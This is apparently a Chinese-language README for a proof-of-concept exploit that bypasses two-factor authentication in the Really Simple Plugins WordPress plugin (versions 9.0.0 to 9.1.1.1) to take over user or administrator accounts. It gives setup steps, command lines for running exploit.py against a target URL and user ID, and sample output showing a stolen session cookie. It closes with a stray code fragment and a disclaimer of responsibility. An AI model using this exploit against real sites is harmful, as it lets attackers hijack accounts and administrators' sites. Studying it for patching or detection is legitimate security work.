Really Simple Plugins WordPress 插件(版本 9.0.0 至 9.1.1.1 包括)的 REST API 中存在一个错误处理缺陷,当启用双因素身份验证时,攻击者可以绕过身份验证并控制现有用户或管理员帐户。
作为一个好人,您还会找到该插件的 9.1.1.1 版本。只需解压并上传到 wp-content/plugins 文件夹。别忘了激活插件并启用 2FA。
使用 pip 安装所需的依赖项:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
指定用户 ID:
python exploit.py -id 10 http://localhost:8886/
这会以用户 ID 10 发送漏洞载荷。
不指定用户 ID:
python exploit.py http://localhost
默认用户 ID 为 1。
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False)。我不知道,但我不对任何事情负责。